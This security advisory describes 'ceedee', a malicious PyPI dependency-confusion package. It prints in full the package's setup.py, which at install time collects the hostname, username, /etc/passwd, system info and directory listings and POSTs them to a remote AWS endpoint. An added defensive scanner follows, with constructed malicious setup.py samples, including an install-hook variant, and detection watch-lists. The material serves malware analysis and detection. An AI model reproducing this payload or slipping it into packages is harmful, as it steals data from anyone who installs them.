Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Avoid using all malicious instances of the ceedee package.
ceedee is a malicious package. It is a "dependency confusion" package: its name is modelled on an existing repository, namespace, or internal component, so that a resolver which also consults the public index (for example pip configured with an extra index URL) picks up this package instead of the intended private one, and with it the malicious code.
The package exfiltrates host data, including the contents of /etc/passwd, to a remote AWS API Gateway endpoint, rk8xxqzdug.execute-api.us-east-1.amazonaws.com. The payload lives in the package's setup.py file, so it runs when pip builds or installs the source distribution, before any module from the package is imported:
```python
from setuptools import setup, find_packages
import os
import platform
import requests          # imported but never used in this excerpt
from urllib import request, parse

# Please do not delete this.

# Everything below is module-level code: it executes as soon as pip
# evaluates setup.py, without anything from the package being imported.
os_name = platform.system()
data = {}
if os_name == 'Linux' or os_name == 'Darwin':
    try:
        # Host fingerprint plus the full contents of /etc/passwd
        hostname = os.popen('hostname').read()
        whoami = os.popen('whoami').read()
        passwd_file = os.popen('cat /etc/passwd').read()
        os_info = os.popen('uname -a').read()
        curr_dir = os.popen("pwd").read()
        list_curr_dir = os.popen("ls -la").read()

        data = {
            'OS': os_name,
            'Hostname': hostname,
            'Logged In Username': whoami,
            'Password File': passwd_file,
            'OS Information': os_info,
            'Current Directory': curr_dir,
            'List of files in Current Directory': list_curr_dir
        }
    except:
        data = {'Error': 'There was an error while fetching OS related data or sending information for ' + os_name}
elif os_name == 'Windows':
    try:
        # Same collection on Windows, minus the password file
        hostname = os.popen('hostname').read()
        whoami = os.popen('whoami').read()
        curr_dir = os.popen("cd").read()
        list_curr_dir = os.popen("dir").read()

        data = {
            'OS': os_name,
            'Hostname': hostname,
            'Logged In Username': whoami,
            'Current Directory': curr_dir,
            'List of files in Current Directory': list_curr_dir
        }
    except:
        data = {'Error': 'There was an error while fetching OS related data or sending information for ' + os_name}
else:
    data = {'Error': 'Cannot determine OS'}

# Form-encode whatever was collected and POST it to the attacker's
# API Gateway endpoint. This call is not inside a try/except, so a
# failed POST aborts the install with a traceback.
data_enc = parse.urlencode(data).encode()
API_ENDPOINT = "https://rk8xxqzdug.execute-api.us-east-1.amazonaws.com/Test/response"
req = request.Request(API_ENDPOINT, data=data_enc)
res = request.urlopen(req)
```
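The following is an added example, not part of the Snyk advisory and not code from the ceedee package: a static triage script that parses a setup.py with Python's ast module and flags the install-time behaviour shown above (shell execution through os.popen and similar calls, outbound HTTP through urllib.request or requests, and string literals naming sensitive files or remote endpoints). The two sample setup.py strings are constructed; the first mirrors the snippet on this page (the execute-api hostname is the one from the advisory), and the second goes beyond the page by hiding the same payload in a setuptools cmdclass install hook, the variant a check that only looks at module-level code would miss. The call lists and the regular expression are the author's assumptions about what is worth flagging, not a complete catalogue.

```python
"""Static triage of a setup.py for the install-time exfiltration pattern.
Added example for this advisory, not Snyk's or the ceedee package's code:
parses setup.py with ast and flags shell execution, outbound HTTP and
suspicious string literals, noting whether each runs at module level (the
moment pip executes setup.py) or inside a function such as an install hook.
"""
import ast
import re
from dataclasses import dataclass

# Calls that spawn shell commands or subprocesses (assumed watch-list).
EXEC_CALLS = {"os.popen", "os.system", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "subprocess.check_output"}
# Calls that open outbound network connections (assumed watch-list).
NET_CALLS = {"urllib.request.urlopen", "request.urlopen", "urlopen",
             "requests.get", "requests.post"}
# String literals that have no business in a build script.
SENSITIVE_LITERAL = re.compile(
    r"/etc/passwd|/etc/shadow|\.ssh/|\.aws/credentials"
    r"|[a-z0-9]+\.execute-api\.[a-z0-9-]+\.amazonaws\.com|https?://", re.I)


@dataclass(frozen=True)
class Finding:
    kind: str        # "exec", "network" or "literal"
    detail: str      # dotted call name, or the matched string literal
    lineno: int
    at_import: bool  # True if executed as soon as setup.py is run


def _dotted_name(node):
    """Return 'pkg.attr.name' for a Name/Attribute chain, '' otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _walk(node, at_import=True):
    """Yield (descendant, at_import); the flag drops to False inside function
    bodies, which only run if something calls them (e.g. an install hook)."""
    for child in ast.iter_child_nodes(node):
        inner = at_import and not isinstance(
            child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda))
        yield child, inner
        yield from _walk(child, inner)


def scan_setup_py(source):
    """Return every exec/network call and sensitive literal, sorted by line."""
    findings = []
    for node, at_import in _walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(Finding("exec", name, node.lineno, at_import))
            elif name in NET_CALLS:
                findings.append(Finding("network", name, node.lineno, at_import))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SENSITIVE_LITERAL.search(node.value):
                findings.append(Finding("literal", node.value, node.lineno, at_import))
    return sorted(findings, key=lambda f: f.lineno)


def is_suspicious(findings):
    """Shell execution plus a network call in a build script is the
    exfiltration pattern and should block the install."""
    kinds = {f.kind for f in findings}
    return "exec" in kinds and "network" in kinds


# Constructed sample mirroring the ceedee snippet (endpoint as in the advisory).
CEEDEE_LIKE_SETUP_PY = '''\
from setuptools import setup
import os
from urllib import request, parse
data = {'passwd': os.popen('cat /etc/passwd').read()}
req = request.Request("https://rk8xxqzdug.execute-api.us-east-1.amazonaws.com/Test/response",
                      data=parse.urlencode(data).encode())
request.urlopen(req)
setup(name="ceedee", version="0.0.1")
'''

# Constructed variant: the same payload hidden in a cmdclass install hook, so
# it is not module-level code but still runs during `pip install`.
CMDCLASS_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import subprocess, urllib.request
class PostInstall(install):
    def run(self):
        install.run(self)
        out = subprocess.check_output(["whoami"])
        urllib.request.urlopen("https://rk8xxqzdug.execute-api.us-east-1.amazonaws.com/Test/response", data=out)
setup(name="ceedee", cmdclass={"install": PostInstall})
'''
```

Run it against a downloaded sdist before installing (pip download fetches the archive without executing setup.py), and treat any result where is_suspicious() is true as a hard stop. The at_import flag separates code that fires the instant setup.py is evaluated, as in the ceedee sample, from code that waits for the install command; both run during a normal pip install, so neither should be waved through.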